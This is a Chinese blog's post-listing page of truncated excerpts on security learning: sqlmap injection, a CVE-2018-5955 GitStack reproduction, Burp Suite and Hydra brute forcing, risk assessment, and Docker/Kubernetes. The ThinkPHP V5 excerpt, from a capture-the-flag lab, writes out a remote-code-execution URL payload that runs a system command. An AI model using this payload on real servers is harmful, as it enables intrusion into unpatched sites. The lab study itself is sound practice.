摘要: sql 注入get与post模式语句 get sqlmap -u url/?inject=1 Parameter: inject (GET) # get Type: boolean-based blind #布尔盲注 Title: AND boolean-based blind - WHERE or HAVING clause Payl 阅读全文
posted @ 2020-08-06 10:58 小疯紫 阅读(791) 评论(0) 推荐(0) 编辑
摘要: CVE-2018-5955 漏洞复现 系统 安装软件 Windows 7 GitStack 2.3.10 kali linux pythonpocsuite 靶 GitStack 2.3.10中文版下载 一路回车安装完成 安装完成后,将浏览器启动到http://localhost/gitstack 箭 CVE-2018-5955.py 阅读全文
posted @ 2020-07-24 00:00 小疯紫 阅读(444) 评论(0) 推荐(1) 编辑
摘要: 黑客技术练习网站 22个黑客技术练习网站 关注雨苁大佬 阅读全文
posted @ 2020-07-02 00:00 小疯紫 阅读(220) 评论(0) 推荐(0) 编辑
摘要: burpSuite与九头蛇暴力破解 登录界面\ BrupSuite自带暴力破解 使用 BrupSuite 进行抓包: 发现账户和密码是使用GET方式提交的,然后我们右键将抓到的包发送到 测试器Intruder 模块进行暴力破解: 狙击手模式(Sniper)——它使用一组Payload集合,依次替换Payload位置上(一次攻击只能使用 阅读全文
posted @ 2020-06-30 00:00 小疯紫 阅读(361) 评论(0) 推荐(0) 编辑
摘要: 风险评估介绍及工作流程、注意事项 风险评估是对某一个系统、资产进行安全风险评估的过程 风险评估流程分为4个阶段 阶段1:准备阶段 对信息系统风险评估项目目标、范围、项目交付文件、项目实施方案、工作方式、评估成果提交形式讨论确定。形成完整的《风险评估实施方案》 阶段2:识别阶段 资产识别 资产定义 资产 是企业、机构直接赋予了价值因而 阅读全文
posted @ 2020-06-20 15:37 小疯紫 阅读(2763) 评论(0) 推荐(0) 编辑
摘要: 解决burpsuit 浏览器您的连接不是私密连接的问题 https://images.cnblogs.com/cnblogs_com/jiangyatao/1818240/o_211005135758taoyuying.png 阅读全文
posted @ 2020-06-16 10:24 小疯紫 阅读(2242) 评论(0) 推荐(1) 编辑
摘要: thinkPHP V5  漏洞:Web: php_rce  攻防世界 Web: php_rce http://220.249.52.133:44797/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ——i 阅读全文
posted @ 2020-03-31 00:00 小疯紫 阅读(358) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2020-01-14 18:06 小疯紫 阅读(2151) 评论(0) 推荐(1) 编辑
摘要: dockers-k8s本地共享仓库 docker k8s 组件名称 说明 kube-dns 负责为整个集群提供DNS服务 Ingress Controller 为服务提供外网入口 Heapster 提供资源监控 Dashboard 提供GUI Federation 提供跨可用区的集群 Fluentd-elasticsearch 提供集 阅读全文
posted @ 2019-11-22 11:24 小疯紫 阅读(573) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2019-11-21 15:28 小疯紫 阅读(196) 评论(0) 推荐(0) 编辑